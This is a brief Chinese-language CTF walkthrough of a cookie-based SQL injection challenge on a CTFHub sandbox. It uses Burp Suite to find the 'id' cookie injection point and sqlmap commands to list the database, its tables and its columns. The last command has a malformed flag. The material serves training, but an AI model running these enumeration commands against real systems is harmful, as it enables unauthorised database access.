首先,我们可以使用burpsuite进行抓包。
如图所示,可以发现注入点为id=1。
然后我们可以使用kali linux里的sqlmap自动注入。
首先查询数据库名称sqlmap -u "http://challenge-593b577518b0da97.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 --dbs
发现数据库为sqli
然后查询数据库表 sqlmap -u "http://challenge-593b577518b0da97.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 -D sqli --tables
发现表名称
然后查询字段名称
sqlmap -u "http://challenge-593b577518b0da97.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 -D sqli -T ydzavwcdof -- columns